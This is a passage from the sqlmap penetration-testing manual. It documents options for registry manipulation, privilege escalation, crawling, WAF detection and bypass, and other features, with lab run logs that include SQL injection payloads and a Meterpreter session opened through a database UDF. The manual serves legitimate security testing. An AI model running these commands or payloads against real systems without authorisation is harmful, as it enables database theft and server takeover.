[*] Starting the payload handler...
[hh:mm:48] [INFO] running Metasploit Framework shellcode remotely via UDF 'sys_b
ineval', please wait..
[*] Sending stage (749056 bytes) to 192.168.136.129
[*] Meterpreter session 1 opened (192.168.136.1:60641 -> 192.168.136.129:1689) a
t Mon Apr 11 hh:mm:52 +0100 2011

meterpreter > Loading extension espia...success.
meterpreter > Loading extension incognito...success.
meterpreter > [-] The 'priv' extension has already been loaded.
meterpreter > Loading extension sniffer...success.
meterpreter > System Language : en_US
OS              : Windows .NET Server (Build 3790, Service Pack 2).
Computer        : W2K3R2
Architecture    : x86
Meterpreter     : x86/win32
meterpreter > Server username: NT AUTHORITY\SYSTEM
meterpreter > ipconfig

MS TCP Loopback interface
Hardware MAC: 00:00:00:00:00:00
IP Address  : 127.0.0.1
Netmask     : 255.0.0.0



Intel(R) PRO/1000 MT Network Connection
Hardware MAC: 00:0c:29:fc:79:39
IP Address  : 192.168.136.129
Netmask     : 255.255.255.0


meterpreter > exit

[*] Meterpreter session 1 closed.  Reason: User exit

By default MySQL on Windows runs as SYSTEM, however PostgreSQL runs as a low-privileged user postgres on both Windows and Linux. Microsoft SQL Server 2000 by default runs as SYSTEM, whereas Microsoft SQL Server 2005 and 2008 run most of the times as NETWORK SERVICE and sometimes as LOCAL SERVICE.

It is possible to provide sqlmap with switch --priv-esc to perform a database process’ user privilege escalation via Metasploit’s getsystem command which include, among others, the kitrap0d technique (MS10-015).

Windows registry access

It is possible to access Windows registry when the back-end database management system is either MySQL, PostgreSQL or Microsoft SQL Server, and when the web application supports stacked queries. Also, session user has to have the needed privileges to access it.

Read a Windows registry key value

Switch: --reg-read

Using this switch you can read registry key values.

Write a Windows registry key value

Switch: --reg-add

Using this switch you can write registry key values.

Delete a Windows registry key

Switch: --reg-del

Using this switch you can delete registry keys.

Auxiliary registry options

Options: --reg-key, --reg-value, --reg-data and --reg-type

These options can be used to provide data needed for proper running of switches --reg-read, --reg-add and --reg-del. So, instead of providing registry key information when asked, you can use them at command prompt as program arguments.

With --reg-key option you specify used Windows registry key path, with --reg-value value item name inside provided key, with --reg-data value data, while with --reg-type option you specify type of the value item.

A sample command line for adding a registry key hive follows:

$ python sqlmap.py -u http://192.168.136.129/sqlmap/pgsql/get_int.aspx?id=1 --r\
eg-add --reg-key="HKEY_LOCAL_MACHINE\SOFTWARE\sqlmap" --reg-value=Test --reg-ty\
pe=REG_SZ --reg-data=1

General

These options can be used to set some general working parameters.

Load session from a stored (.sqlite) file

Option: -s

sqlmap automatically creates a persistent session SQLite file for each target, inside dedicated output directory, where it stores all data required for session resumal. If user wants to explicitly set the session file location (e.g. for storing of session data for multiple targets at one place) he can use this option.

Log HTTP(s) traffic to a textual file

Option: -t

This option requires an argument that specified the textual file to write all HTTP(s) traffic generated by sqlmap – HTTP(S) requests and HTTP(S) responses.

This is useful primarily for debug purposes – when you provide the developers with a potential bug report, send this file too.

Act in non-interactive mode

Switch: --batch

If you want sqlmap to run as a batch tool, without any user’s interaction when sqlmap requires it, you can force that by using switch --batch. This will leave sqlmap to go with a default behaviour whenever user’s input would be required.

Binary content retrieval

Option --binary-fields

In case of binary content retrieval, like in example of tables having column(s) with stored binary values (e.g. column password with binary stored password hash values), it is possible to use option --binary-fields for (extra) proper handling by sqlmap. All those fields (i.e. table columns) are then retrieved and represented in their hexadecimal representation, so afterwards they could be properly processed with other tools (e.g. john).

Custom (blind) SQL injection charset

Option: --charset

During boolean-based blind and time-based blind SQL injection cases, user can force the usage of custom charset to speed-up the data retrieval process. For example, in case of dumping message digest values (e.g. SHA1), by using (e.g.) --charset="0123456789abcdef" expected number of requests is around 30% less than in regular run.

Crawl the website starting from the target URL

Option: --crawl

sqlmap can collect potentially vulnerable links by collecting them (crawling) starting from the target location. Using this option user can set a depth (distance from a starting location) below which sqlmap won’t go in collecting phase, as the process is being done recursively as long as there are new links to be visited.

Example run against a MySQL target:

$ python sqlmap.py -u "http://192.168.21.128/sqlmap/mysql/" --batch --crawl=3
[...]
[xx:xx:53] [INFO] starting crawler
[xx:xx:53] [INFO] searching for links with depth 1
[xx:xx:53] [WARNING] running in a single-thread mode. This could take a while
[xx:xx:53] [INFO] searching for links with depth 2
[xx:xx:54] [INFO] heuristics detected web page charset 'ascii'
[xx:xx:00] [INFO] 42/56 links visited (75%)
[...]

Option --crawl-exclude

With this option you can exclude pages from crawling by providing a regular expression. For example, if you want to skip all pages that have the keyword logout in their paths, you can use --crawl-exclude=logout.

Delimiting character used in CSV output

Option: --csv-del

When data being dumped is stored into the CSV format (--dump-format=CSV), entries have to be separated with a “separation value” (default is ,). In case that user wants to override its default value he can use this option (e.g. --csv-del=";").

DBMS authentication credentials

Option: --dbms-cred

In some cases user will be warned that some operations failed because of lack of current DBMS user privileges and that he could try to use this option. In those cases, if he provides admin user credentials to sqlmap by using this option, sqlmap will try to rerun the problematic part with specialized “run as” mechanisms (e.g. OPENROWSET on Microsoft SQL Server) using those credentials.

Format of dumped data

Option: --dump-format

sqlmap supports three different types of formatting when storing dumped table data into the corresponding file inside an output directory: CSV, HTML and SQLITE. Default one is CSV, where each table row is stored into a textual file line by line, and where each entry is separated with a comma character , (or one provided with option --csv-del). In case of HTML, output is being stored into a HTML file, where each row is represented with a row inside a formatted table. In case of SQLITE, output is being stored into a SQLITE database, where original table content is replicated into the corresponding table having a same name.

Force character encoding used for data retrieval

Option: --encoding

For proper decoding of character data sqlmap uses either web server provided information (e.g. HTTP header Content-Type) or a heuristic result coming from a 3rd party library chardet.

Nevertheless, there are cases when this value has to be overwritten, especially when retrieving data containing international non-ASCII letters (e.g. --encoding=GBK). It has to be noted that there is a possibility that character information is going to be irreversibly lost due to implicit incompatibility between stored database content and used database connector at the target side.

Estimated time of arrival

Switch: --eta

It is possible to calculate and show in real time the estimated time of arrival to retrieve each query output. This is shown when the technique used to retrieve the output is any of the blind SQL injection types.

Example against an Oracle target affected only by boolean-based blind SQL injection:

$ python sqlmap.py -u "http://192.168.136.131/sqlmap/oracle/get_int_bool.php?id\
=1" -b --eta

[...]
[hh:mm:01] [INFO] the back-end DBMS is Oracle
[hh:mm:01] [INFO] fetching banner
[hh:mm:01] [INFO] retrieving the length of query output
[hh:mm:01] [INFO] retrieved: 64
17% [========>                                          ] 11/64  ETA 00:19

Then:

100% [===================================================] 64/64
[hh:mm:53] [INFO] retrieved: Oracle Database 10g Enterprise Edition Release 10.2
.0.1.0 - Prod

web application technology: PHP 5.2.6, Apache 2.2.9
back-end DBMS: Oracle
banner:    'Oracle Database 10g Enterprise Edition Release 10.2.0.1.0 - Prod'

As you can see, sqlmap first calculates the length of the query output, then estimates the time of arrival, shows the progress in percentage and counts the number of retrieved output characters.

Flush session files

Option: --flush-session

As you are already familiar with the concept of a session file from the description above, it is good to know that you can flush the content of that file using option --flush-session. This way you can avoid the caching mechanisms implemented by default in sqlmap. Other possible way is to manually remove the session file(s).

Parse and test forms’ input fields

Switch: --forms

Say that you want to test against SQL injections a huge search form or you want to test a login bypass (typically only two input fields named like username and password), you can either pass to sqlmap the request in a request file (-r), set the POSTed data accordingly (--data) or let sqlmap do it for you!

Both of the above mentioned instances, and many others, appear as <form> and <input> tags in HTML response bodies and this is where this switch comes into play.

Provide sqlmap with --forms as well as the page where the form can be found as the target URL (-u) and sqlmap will request the target URL for you, parse the forms it has and guide you through to test for SQL injection on those form input fields (parameters) rather than the target URL provided.

Ignore query results stored in session file

Switch: --fresh-queries

As you are already familiar with the concept of a session file from the description above, it is good to know that you can ignore the content of that file using option --fresh-queries. This way you can keep the session file untouched and for a selected run, avoid the resuming/restoring of queries output.

Use DBMS hex function(s) for data retrieval

Switch: --hex

In lost of cases retrieval of non-ASCII data requires special needs. One solution for that problem is usage of DBMS hex function(s). Turned on by this switch, data is encoded to it’s hexadecimal form before being retrieved and afterwards unencoded to it’s original form.

Example against a PostgreSQL target:

$ python sqlmap.py -u "http://192.168.48.130/sqlmap/pgsql/get_int.php?id=1" --b\
anner --hex -v 3 --parse-errors

[...]
[xx:xx:14] [INFO] fetching banner
[xx:xx:14] [PAYLOAD] 1 AND 5849=CAST((CHR(58)||CHR(118)||CHR(116)||CHR(106)||CHR
(58))||(ENCODE(CONVERT_TO((COALESCE(CAST(VERSION() AS CHARACTER(10000)),(CHR(32)
))),(CHR(85)||CHR(84)||CHR(70)||CHR(56))),(CHR(72)||CHR(69)||CHR(88))))::text||(
CHR(58)||CHR(110)||CHR(120)||CHR(98)||CHR(58)) AS NUMERIC)
[xx:xx:15] [INFO] parsed error message: 'pg_query() [<a href='function.pg-query'
>function.pg-query</a>]: Query failed: ERROR:  invalid input syntax for type num
eric: ":vtj:506f737467726553514c20382e332e39206f6e20693438362d70632d6c696e75782d
676e752c20636f6d70696c656420627920474343206763632d342e332e7265616c20284465626961
6e2032e332e322d312e312920342e332e32:nxb:" in <b>/var/www/sqlmap/libs/pgsql.inc.p
hp</b> on line <b>35</b>'
[xx:xx:15] [INFO] retrieved: PostgreSQL 8.3.9 on i486-pc-linux-gnu, compiled by 
GCC gcc-4.3.real (Debian 4.3.2-1.1) 4.3.2
[...]

Custom output directory path

Option: --output-dir

sqlmap by default stores session and result files inside a subdirectory output. In case you want to use a different location, you can use this option (e.g. --output-dir=/tmp).

Parse DBMS error messages from response pages

Switch: --parse-errors

If the web application is configured in debug mode so that it displays in the HTTP responses the back-end database management system error messages, sqlmap can parse and display them for you.

This is useful for debugging purposes like understanding why a certain enumeration or takeover switch does not work – it might be a matter of session user’s privileges and in this case you would see a DBMS error message along the lines of Access denied for user <SESSION USER>.

Example against a Microsoft SQL Server target:

$ python sqlmap.py -u "http://192.168.21.129/sqlmap/mssql/iis/get_int.asp?id=1"\
 --parse-errors
[...]
[xx:xx:17] [INFO] ORDER BY technique seems to be usable. This should reduce the 
timeneeded to find the right number of query columns. Automatically extending th
e rangefor current UNION query injection technique test
[xx:xx:17] [INFO] parsed error message: 'Microsoft OLE DB Provider for ODBC Driv
ers (0x80040E14)
[Microsoft][ODBC SQL Server Driver][SQL Server]The ORDER BY position number 10 i
s out of range of the number of items in the select list.
<b>/sqlmap/mssql/iis/get_int.asp, line 27</b>'
[xx:xx:17] [INFO] parsed error message: 'Microsoft OLE DB Provider for ODBC Driv
ers (0x80040E14)
[Microsoft][ODBC SQL Server Driver][SQL Server]The ORDER BY position number 6 is
 out of range of the number of items in the select list.
<b>/sqlmap/mssql/iis/get_int.asp, line 27</b>'
[xx:xx:17] [INFO] parsed error message: 'Microsoft OLE DB Provider for ODBC Driv
ers (0x80040E14)
[Microsoft][ODBC SQL Server Driver][SQL Server]The ORDER BY position number 4 is
 out of range of the number of items in the select list.
<b>/sqlmap/mssql/iis/get_int.asp, line 27</b>'
[xx:xx:17] [INFO] target URL appears to have 3 columns in query
[...]

Save options in a configuration INI file

Option: --save

It is possible to save the command line options to a configuration INI file. The generated file can then be edited and passed to sqlmap with the -c option as explained above.

Update sqlmap

Switch: --update

Using this option you can update the tool to the latest development version directly from the Git repository. You obviously need Internet access.

If, for any reason, this operation fails, run git pull from your sqlmap working copy. It will perform the exact same operation of switch --update. If you are running sqlmap on Windows, you can use the SmartGit client.

This is strongly recommended before reporting any bug to the mailing lists.

Miscellaneous

Use short mnemonics

Option: -z

It could become tedious to type all desired options and switches, especially for those that are used most often (e.g. --batch --random-agent --ignore-proxy --technique=BEU). There is a simpler and much shorter way how to deal with that problem. In sqlmap it’s called “mnemonics”.

Each option and switch can be written in a shorter mnemonic form using option -z, separated with a comma character (,), where mnemonics represent only the first arbitrarily chosen part of the original name. There is no strict mapping of options and switches to their respective shortened counterparts. Only required condition is that there is no other option nor switch that has a same prefix as the desired one.

Example:

$ python sqlmap.py --batch --random-agent --ignore-proxy --technique=BEU -u "ww\
w.target.com/vuln.php?id=1"

can be written (one of many ways) in shorter mnemonic form like:

$ python sqlmap.py -z "bat,randoma,ign,tec=BEU" -u "www.target.com/vuln.php?id=\
1"

Another example:

$ python sqlmap.py --ignore-proxy --flush-session --technique=U --dump -D testd\
b -T users -u "www.target.com/vuln.php?id=1"

can be written in shorter mnemonic form like:

$ python sqlmap.py -z "ign,flu,bat,tec=U,dump,D=testdb,T=users" -u "www.target.\
com/vuln.php?id=1"

Alerting on successful SQL injection detection

Option: --alert

Set answers for questions

Option: --answers

In case that user wants to automatically set up answers for questions, even if --batch is used, using this option he can do it by providing any part of question together with answer after an equal sign. Also, answers for different question can be split with delimiter character ,.

Example against a MySQL target:

$ python sqlmap.py -u "http://192.168.22.128/sqlmap/mysql/get_int.php?id=1"--te\
chnique=E --answers="extending=N" --batch
[...]
[xx:xx:56] [INFO] testing for SQL injection on GET parameter 'id'
heuristic (parsing) test showed that the back-end DBMS could be 'MySQL'. Do you 
want to skip test payloads specific for other DBMSes? [Y/n] Y
[xx:xx:56] [INFO] do you want to include all tests for 'MySQL' extending provide
d level (1) and risk (1)? [Y/n] N
[...]

Make a beep sound when SQL injection is found

Switch: --beep

In case that user uses switch --beep he’ll be warned with a beep sound immediately when SQL injection is found. This is especially useful when there is a large bulk list (option -m) of target URLs to be tested.

Cleanup the DBMS from sqlmap specific UDF(s) and table(s)

Switch: --cleanup

It is recommended to clean up the back-end database management system from sqlmap temporary table(s) and created user-defined function(s) when you are done taking over the underlying operating system or file system. Switch --cleanup will attempt to clean up the DBMS and the file system wherever possible.

Check for dependencies

Switch: --dependencies

sqlmap in some special cases requires independent installation of extra 3rd party libraries (e.g. options -d, switch --os-pwn in case of icmpsh tunneling, option --auth-type in case of NTLM HTTP authentication type, etc.) and it will warn the user only in such special cases. But, if you want to independently check for all those extra 3rd party library dependencies you can use switch --dependencies.

$ python sqlmap.py --dependencies
[...]
[xx:xx:28] [WARNING] sqlmap requires 'python-kinterbasdb' third-party library in
 order to directly connect to the DBMS Firebird. Download from http://kinterbasd
b.sourceforge.net/
[xx:xx:28] [WARNING] sqlmap requires 'python-pymssql' third-party library in ord
er to directly connect to the DBMS Sybase. Download from http://pymssql.sourcefo
rge.net/
[xx:xx:28] [WARNING] sqlmap requires 'python pymysql' third-party library in ord
er to directly connect to the DBMS MySQL. Download from https://github.com/peteh
unt/PyMySQL/
[xx:xx:28] [WARNING] sqlmap requires 'python cx_Oracle' third-party library in o
rder to directly connect to the DBMS Oracle. Download from http://cx-oracle.sour
ceforge.net/
[xx:xx:28] [WARNING] sqlmap requires 'python-psycopg2' third-party library in or
der to directly connect to the DBMS PostgreSQL. Download from http://initd.org/p
sycopg/
[xx:xx:28] [WARNING] sqlmap requires 'python ibm-db' third-party library in orde
r to directly connect to the DBMS IBM DB2. Download from http://code.google.com/
p/ibm-db/
[xx:xx:28] [WARNING] sqlmap requires 'python jaydebeapi & python-jpype' third-pa
rty library in order to directly connect to the DBMS HSQLDB. Download from https
://pypi.python.org/pypi/JayDeBeApi/ & http://jpype.sourceforge.net/
[xx:xx:28] [WARNING] sqlmap requires 'python-pyodbc' third-party library in orde
r to directly connect to the DBMS Microsoft Access. Download from http://pyodbc.
googlecode.com/
[xx:xx:28] [WARNING] sqlmap requires 'python-pymssql' third-party library in ord
er to directly connect to the DBMS Microsoft SQL Server. Download from http://py
mssql.sourceforge.net/
[xx:xx:28] [WARNING] sqlmap requires 'python-ntlm' third-party library if you pl
an to attack a web application behind NTLM authentication. Download from http://
code.google.com/p/python-ntlm/
[xx:xx:28] [WARNING] sqlmap requires 'websocket-client' third-party library if y
ou plan to attack a web application using WebSocket. Download from https://pypi.
python.org/pypi/websocket-client/

Disable console output coloring

Switch: --disable-coloring

sqlmap by default uses coloring while writting to console. In case of undesired effects (e.g. console appearance of uninterpreted ANSI coloring codes like \x01\x1b[0;32m\x02[INFO]) you can disable console output coloring by using this switch.

Use Google dork results from specified page number

Option: --gpage

Default sqlmap behavior with option -g is to do a Google search and use the first 100 resulting URLs for further SQL injection testing. However, in combination with this option you can specify with this option (--gpage) a page other than the first one to retrieve target URLs from.

Use HTTP parameter pollution

Switch: --hpp

HTTP parameter pollution (HPP) is a method for bypassing WAF/IPS/IDS protection mechanisms (explained here) that is particularly effective against ASP/IIS and ASP.NET/IIS platforms. If you suspect that the target is behind such protection, you can try to bypass it by using this switch.

Make a through testing for a WAF/IPS/IDS protection

Switch: --identify-waf

sqlmap can try to identify backend WAF/IPS/IDS protection (if any) so user could do appropriate steps (e.g. use tamper scripts with --tamper). Currently around 30 different products are supported (Airlock, Barracuda WAF, etc.) and their respective WAF scripts can be found inside waf directory.

Example against a MySQL target protected by the ModSecurity WAF:

$ python sqlmap.py -u "http://192.168.21.128/sqlmap/mysql/get_int.php?id=1" --i\
dentify-waf -v 3
[...]
[xx:xx:23] [INFO] testing connection to the target URL
[xx:xx:23] [INFO] heuristics detected web page charset 'ascii'
[xx:xx:23] [INFO] using WAF scripts to detect backend WAF/IPS/IDS protection
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'USP Secure Entry Server (Un
ited Security Providers)'
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'BinarySEC Web Application F
irewall (BinarySEC)'
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'NetContinuum Web Applicatio
n Firewall (NetContinuum/Barracuda Networks)'
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'Hyperguard Web Application 
Firewall (art of defence Inc.)'
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'Cisco ACE XML Gateway (Cisc
o Systems)'
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'TrafficShield (F5 Networks)
'
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'Teros/Citrix Application Fi
rewall Enterprise (Teros/Citrix Systems)'
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'KONA Security Solutions (Ak
amai Technologies)'
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'Incapsula Web Application F
irewall (Incapsula/Imperva)'
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'CloudFlare Web Application 
Firewall (CloudFlare)'
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'Barracuda Web Application F
irewall (Barracuda Networks)'
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'webApp.secure (webScurity)'
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'Proventia Web Application S
ecurity (IBM)'
[xx:xx:23] [DEBUG] declared web page charset 'iso-8859-1'
[xx:xx:23] [DEBUG] page not found (404)
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'KS-WAF (Knownsec)'
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'NetScaler (Citrix Systems)'
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'Jiasule Web Application Fir
ewall (Jiasule)'
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'WebKnight Application Firew
all (AQTRONIX)'
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'AppWall (Radware)'
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'ModSecurity: Open Source We
b Application Firewall (Trustwave)'
[xx:xx:23] [CRITICAL] WAF/IDS/IPS identified 'ModSecurity: Open Source Web Appli
cation Firewall (Trustwave)'. Please consider usage of tamper scripts (option '-
-tamper')
[...]

Skip heuristic detection of WAF/IPS/IDS protection

Switch: --skip-waf

By default, sqlmap automatically sends inside one of starting requests a dummy parameter value containing a deliberately “suspicious” SQL injection payload (e.g. ...&foobar=AND 1=1 UNION ALL SELECT 1,2,3,table_name FROM information_schema.tables WHERE 2>1). If target responds differently than for the original request, there is a high possibility that it’s under some kind of protection. In case of any problems, user can disable this mechanism by providing switch --skip-waf.

Imitate smartphone

Switch: --mobile

Sometimes web servers expose different interfaces toward mobile phones than to desktop computers. In such cases you can enforce usage of one of predetermined smartphone HTTP User-Agent header values. By using this switch, sqlmap will ask you to pick one of popular smartphones which it will imitate in current run.

Example run:

$ python sqlmap.py -u "http://www.target.com/vuln.php?id=1" --mobile
[...]
which smartphone do you want sqlmap to imitate through HTTP User-Agent header?
[1] Apple iPhone 4s (default)
[2] BlackBerry 9900
[3] Google Nexus 7
[4] HP iPAQ 6365
[5] HTC Sensation
[6] Nokia N97
[7] Samsung Galaxy S
> 1
[...]

Work in offline mode (only use session data)

Switch: --offline

By using switch --offline sqlmap will use only previous session data in data enumeration. This basically means that there will be zero connection attempts during such run.

Safely remove all content from output directory

Switch --purge-output

In case that user decides to safely remove all content from output directory, containing all target details from previous sqlmap runs, he can use switch --purge-output. While purging, all files from (sub)directories in folder output will be overwritten with random data, truncated, renamed to random names, (sub)directories will be renamed to random names too, and finally the whole directory tree will be deleted.

Example run:

$ python sqlmap.py --purge-output -v 3
[...]
[xx:xx:55] [INFO] purging content of directory '/home/user/sqlmap/output'...
[xx:xx:55] [DEBUG] changing file attributes
[xx:xx:55] [DEBUG] writing random data to files
[xx:xx:55] [DEBUG] truncating files
[xx:xx:55] [DEBUG] renaming filenames to random values
[xx:xx:55] [DEBUG] renaming directory names to random values
[xx:xx:55] [DEBUG] deleting the whole directory tree
[...]

Conduct through tests only if positive heuristic(s)

Switch --smart

There are cases when user has a large list of potential target URLs (e.g. provided with option -m) and he wants to find a vulnerable target as fast as possible. If switch --smart is used, only parameters with which DBMS error(s) can be provoked, are being used further in scans. Otherwise they are skipped.

Example against a MySQL target:

$ python sqlmap.py -u "http://192.168.21.128/sqlmap/mysql/get_int.php?ca=17&use\
r=foo&id=1" --batch --smart
[...]
[xx:xx:14] [INFO] testing if GET parameter 'ca' is dynamic
[xx:xx:14] [WARNING] GET parameter 'ca' does not appear dynamic
[xx:xx:14] [WARNING] heuristic (basic) test shows that GET parameter 'ca' might 
not be injectable
[xx:xx:14] [INFO] skipping GET parameter 'ca'
[xx:xx:14] [INFO] testing if GET parameter 'user' is dynamic
[xx:xx:14] [WARNING] GET parameter 'user' does not appear dynamic
[xx:xx:14] [WARNING] heuristic (basic) test shows that GET parameter 'user' migh
t not be injectable
[xx:xx:14] [INFO] skipping GET parameter 'user'
[xx:xx:14] [INFO] testing if GET parameter 'id' is dynamic
[xx:xx:14] [INFO] confirming that GET parameter 'id' is dynamic
[xx:xx:14] [INFO] GET parameter 'id' is dynamic
[xx:xx:14] [WARNING] reflective value(s) found and filtering out
[xx:xx:14] [INFO] heuristic (basic) test shows that GET parameter 'id' might be 
injectable (possible DBMS: 'MySQL')
[xx:xx:14] [INFO] testing for SQL injection on GET parameter 'id'
heuristic (parsing) test showed that the back-end DBMS could be 'MySQL'. Do you 
want to skip test payloads specific for other DBMSes? [Y/n] Y
do you want to include all tests for 'MySQL' extending provided level (1) and ri
sk (1)? [Y/n] Y
[xx:xx:14] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[xx:xx:14] [INFO] GET parameter 'id' is 'AND boolean-based blind - WHERE or HAVI
NG clause' injectable 
[xx:xx:14] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause
'
[xx:xx:14] [INFO] GET parameter 'id' is 'MySQL >= 5.0 AND error-based - WHERE or
 HAVING clause' injectable 
[xx:xx:14] [INFO] testing 'MySQL inline queries'
[xx:xx:14] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[xx:xx:14] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[xx:xx:14] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[xx:xx:24] [INFO] GET parameter 'id' is 'MySQL > 5.0.11 AND time-based blind' in
jectable 
[xx:xx:24] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[xx:xx:24] [INFO] automatically extending ranges for UNION query injection techn
ique tests as there is at least one other potential injection technique found
[xx:xx:24] [INFO] ORDER BY technique seems to be usable. This should reduce the 
time needed to find the right number of query columns. Automatically extending t
he range for current UNION query injection technique test
[xx:xx:24] [INFO] target URL appears to have 3 columns in query
[xx:xx:24] [INFO] GET parameter 'id' is 'MySQL UNION query (NULL) - 1 to 20 colu
mns' injectable
[...]

Select (or skip) tests by payloads and/or titles

Option --test-filter

In case that you want to filter tests by their payloads and/or titles you can use this option. For example, if you want to test all payloads which have ROW keyword inside, you can use --test-filter=ROW.

Example against a MySQL target:

$ python sqlmap.py -u "http://192.168.21.128/sqlmap/mysql/get_int.php?id=1" --b\
atch --test-filter=ROW
[...]
[xx:xx:39] [INFO] GET parameter 'id' is dynamic
[xx:xx:39] [WARNING] reflective value(s) found and filtering out
[xx:xx:39] [INFO] heuristic (basic) test shows that GET parameter 'id' might be 
injectable (possible DBMS: 'MySQL')
[xx:xx:39] [INFO] testing for SQL injection on GET parameter 'id'
[xx:xx:39] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE or HAVING clause
'
[xx:xx:39] [INFO] GET parameter 'id' is 'MySQL >= 4.1 AND error-based - WHERE or
 HAVING clause' injectable 
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any
)? [y/N] N
sqlmap identified the following injection points with a total of 3 HTTP(s) reque
sts:
---
Place: GET
Parameter: id
    Type: error-based
    Title: MySQL >= 4.1 AND error-based - WHERE or HAVING clause
    Payload: id=1 AND ROW(4959,4971)>(SELECT COUNT(*),CONCAT(0x3a6d70623a,(SELEC
T (C
    ASE WHEN (4959=4959) THEN 1 ELSE 0 END)),0x3a6b7a653a,FLOOR(RAND(0)*2))x FRO
M (S
    ELECT 4706 UNION SELECT 3536 UNION SELECT 7442 UNION SELECT 3470)a GROUP BY 
x)
---
[...]

Option --test-skip=TEST

In case that you want to skip tests by their payloads and/or titles you can use this option. For example, if you want to skip all payloads which have BENCHMARK keyword inside, you can use --test-skip=BENCHMARK.

Interactive sqlmap shell

Switch: --sqlmap-shell

By using switch --sqlmap-shell user will be presented with the interactive sqlmap shell which has the history of all previous runs with used options and/or switches:

$ python sqlmap.py --sqlmap-shell
sqlmap-shell> -u "http://testphp.vulnweb.com/artists.php?artist=1" --technique=\
BEU --batch
         _
 ___ ___| |_____ ___ ___  {1.0-dev-2188502}
|_ -| . | |     | .'| . |
|___|_  |_|_|_|_|__,|  _|
      |_|           |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual
 consent is illegal. It is the end user's responsibility to obey all applicable 
local, state and federal laws. Developers assume no liability and are not respon
sible for any misuse or damage caused by this program

[*] starting at xx:xx:11

[xx:xx:11] [INFO] testing connection to the target URL
[xx:xx:12] [INFO] testing if the target URL is stable
[xx:xx:13] [INFO] target URL is stable
[xx:xx:13] [INFO] testing if GET parameter 'artist' is dynamic
[xx:xx:13] [INFO] confirming that GET parameter 'artist' is dynamic
[xx:xx:13] [INFO] GET parameter 'artist' is dynamic
[xx:xx:13] [INFO] heuristic (basic) test shows that GET parameter 'artist' might
 be injectable (possible DBMS: 'MySQL')
[xx:xx:13] [INFO] testing for SQL injection on GET parameter 'artist'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads sp
ecific for other DBMSes? [Y/n] Y
for the remaining tests, do you want to include all tests for 'MySQL' extending 
provided level (1) and risk (1) values? [Y/n] Y
[xx:xx:13] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[xx:xx:13] [INFO] GET parameter 'artist' seems to be 'AND boolean-based blind - 
WHERE or HAVING clause' injectable 
[xx:xx:13] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER B
Y or GROUP BY clause'
[xx:xx:13] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY
 or GROUP BY clause'
[xx:xx:13] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER B
Y or GROUP BY clause (EXTRACTVALUE)'
[xx:xx:13] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY
 or GROUP BY clause (EXTRACTVALUE)'
[xx:xx:14] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER B
Y or GROUP BY clause (UPDATEXML)'
[xx:xx:14] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY
 or GROUP BY clause (UPDATEXML)'
[xx:xx:14] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER B
Y or GROUP BY clause (EXP)'
[xx:xx:14] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE, HAVING clause (E
XP)'
[xx:xx:14] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER B
Y or GROUP BY clause (BIGINT UNSIGNED)'
[xx:xx:14] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE, HAVING clause (B
IGINT UNSIGNED)'
[xx:xx:14] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER B
Y or GROUP BY clause'
[xx:xx:14] [INFO] testing 'MySQL >= 4.1 OR error-based - WHERE, HAVING clause'
[xx:xx:14] [INFO] testing 'MySQL OR error-based - WHERE or HAVING clause'
[xx:xx:14] [INFO] testing 'MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACT
VALUE)'
[xx:xx:14] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[xx:xx:14] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACT
VALUE)'
[xx:xx:15] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (UPDATEX
ML)'
[xx:xx:15] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (EXP)'
[xx:xx:15] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (BIGINT 
UNSIGNED)'
[xx:xx:15] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[xx:xx:15] [INFO] automatically extending ranges for UNION query injection techn
ique tests as there is at least one other (potential) technique found
[xx:xx:15] [INFO] ORDER BY technique seems to be usable. This should reduce the 
